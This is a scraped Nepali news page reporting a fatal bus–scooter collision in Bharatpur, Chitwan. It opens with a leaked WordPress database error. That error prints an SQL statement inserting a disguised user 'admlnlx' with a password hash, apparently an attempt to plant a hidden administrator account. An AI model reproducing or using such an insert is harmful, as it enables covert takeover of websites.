WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BFTMryK4RVI/56hyNHHQvrpiKMOpBi/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 16:32:16', '', 'admlnlx', 'admlnlx')

दुर्घटनामा तीनको मृत्यु – Gaule Khabar

दुर्घटनामा तीनको मृत्यु

दुर्घटनामा तीनको मृत्यु

भरतपुर । चितवनको भरतपुरमा शनिबार साँझ यात्रुबाहक बस र स्कुटर ठक्कर खाँदा तीन जनाको मृत्यु भएको छ । भरतपुर महानगरपालिका–२२ पकौडी बजारमा जगतपुरबाट भरतपुरतर्फ आउँदै गरेको बस र विपरीत दिशाबाट जाँदै गरेको स्कुटर ठक्कर खाँदा स्कुटरमा सवार तीन जनाको मृत्यु भएको हो ।

ना५ख २१५० नं को बस र ना४०प ७०८२ नं को स्कुटर एकआपसमा ठक्कर खाएको जिल्ला प्रहरी कार्यालय चितवनका प्रवक्ता सूर्य थापाले जानकारी दिए । दुर्घटनामा परी स्कुटरमा सवार भरतपुर–६ गीतानगर बस्ने ४० वर्षीय स्कुटर चालक मोहन अधिकारी, स्कुटरमा सवार सोही स्थान बस्ने मोहनकी छोरी १७ वर्षीया विनिसा अधिकारी र सोही स्थान निवासी चालकको दाइकी छोरी १७ वर्षीया दिविसा अधिकारीको मृत्यु भएको थापाले बताए । रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका